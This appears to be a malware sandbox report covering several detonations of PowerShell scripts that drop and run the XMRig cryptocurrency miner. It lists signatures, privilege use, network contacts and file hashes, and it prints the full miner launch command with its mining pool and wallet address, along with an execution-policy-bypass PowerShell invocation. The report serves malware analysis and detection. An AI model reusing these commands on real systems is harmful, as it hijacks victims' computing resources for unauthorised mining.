memory/224-132-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-133-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-134-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-135-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-136-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-137-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-138-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-139-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-140-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-141-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-142-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-143-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-144-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-145-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-146-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-147-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-148-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-149-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-150-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-151-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-152-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-153-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-154-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

memory/224-155-0x00007FF6E72D0000-0x00007FF6E7F03000-memory.dmp

Analysis: behavioral25

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:40

Platform

win10v2004-20240226-en

Max time kernel

1794s

Max time network

1803s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3996 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1388 --field-trial-handle=2280,i,1836084024518340990,18250262151825427757,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 98.58.20.217.in-addr.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
GB 142.250.187.202:443 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 122.140.123.92.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 98.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.113.22.20.in-addr.arpa udp
US 8.8.8.8:53 206.221.208.4.in-addr.arpa udp
US 8.8.8.8:53 28.190.21.2.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 199.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 31.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 78.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 32.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 83.251.17.2.in-addr.arpa udp

Files

memory/4620-0-0x00007FFD84573000-0x00007FFD84575000-memory.dmp

memory/4620-9-0x0000020451060000-0x0000020451082000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fhgefuf1.3yr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4620-11-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/4620-12-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/4620-13-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/4620-15-0x0000020451560000-0x0000020451572000-memory.dmp

memory/4620-16-0x0000020451540000-0x000002045154A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/5504-47-0x0000026D394F0000-0x0000026D39510000-memory.dmp

memory/4620-48-0x00007FFD84573000-0x00007FFD84575000-memory.dmp

memory/4620-49-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/5504-51-0x0000026D39680000-0x0000026D396A0000-memory.dmp

memory/4620-50-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/4620-52-0x00007FFD84570000-0x00007FFD85031000-memory.dmp

memory/5504-53-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-54-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-55-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-57-0x0000026D396C0000-0x0000026D396E0000-memory.dmp

memory/5504-56-0x0000026D396A0000-0x0000026D396C0000-memory.dmp

memory/5504-58-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-59-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-61-0x0000026D396C0000-0x0000026D396E0000-memory.dmp

memory/5504-60-0x0000026D396A0000-0x0000026D396C0000-memory.dmp

memory/5504-62-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-63-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-64-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-65-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-66-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-67-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-68-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-69-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-70-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-71-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-72-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-73-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-74-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-75-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-76-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-77-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-78-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-79-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-80-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-81-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-82-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-83-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-84-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-85-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-86-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-87-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-88-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-89-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-90-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-91-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-92-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-93-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-94-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-95-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-96-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-97-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-98-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-99-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-100-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-101-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-102-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-103-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-104-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-105-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-106-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-107-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-108-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-109-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-110-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-111-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-112-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-113-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-114-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-115-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-116-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-117-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-118-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

memory/5504-119-0x00007FF66B960000-0x00007FF66C593000-memory.dmp

Analysis: behavioral30

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:51

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1788s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 94.65.42.20.in-addr.arpa udp
US 8.8.8.8:53 59.170.16.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 52.142.223.178:80 tcp

Files

memory/4780-3-0x00007FFC7A793000-0x00007FFC7A794000-memory.dmp

memory/4780-5-0x0000021B21800000-0x0000021B21822000-memory.dmp

memory/4780-7-0x00007FFC7A790000-0x00007FFC7B17C000-memory.dmp

memory/4780-9-0x0000021B21B10000-0x0000021B21B86000-memory.dmp

memory/4780-10-0x00007FFC7A790000-0x00007FFC7B17C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fnj3lggg.wtr.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4780-25-0x00007FFC7A790000-0x00007FFC7B17C000-memory.dmp

memory/4780-48-0x0000021B21AB0000-0x0000021B21AC2000-memory.dmp

memory/4780-61-0x0000021B21870000-0x0000021B2187A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3100-90-0x000001FF5ECE0000-0x000001FF5ED00000-memory.dmp

memory/3100-91-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-92-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/4780-93-0x00007FFC7A790000-0x00007FFC7B17C000-memory.dmp

memory/4780-94-0x00007FFC7A793000-0x00007FFC7A794000-memory.dmp

memory/4780-95-0x00007FFC7A790000-0x00007FFC7B17C000-memory.dmp

memory/3100-96-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-97-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-98-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-99-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-100-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-101-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-102-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-103-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-104-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-105-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-106-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-107-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-108-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-109-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-110-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-111-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-112-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-113-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-114-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-115-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-116-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-117-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-118-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-119-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-120-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-121-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-122-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-123-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-124-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-125-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-126-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-127-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-128-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-129-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-130-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-131-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-132-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-133-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-134-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-135-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-136-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-137-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-138-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-139-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-140-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-141-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-142-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-143-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-144-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-145-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-146-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-147-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-148-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-149-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-150-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-151-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-152-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-153-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-154-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-155-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

memory/3100-156-0x00007FF72EF80000-0x00007FF72FBB3000-memory.dmp

Analysis: behavioral32

Detonation Overview

Submitted

2024-05-22 20:12

Reported

2024-05-23 20:51

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1787s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

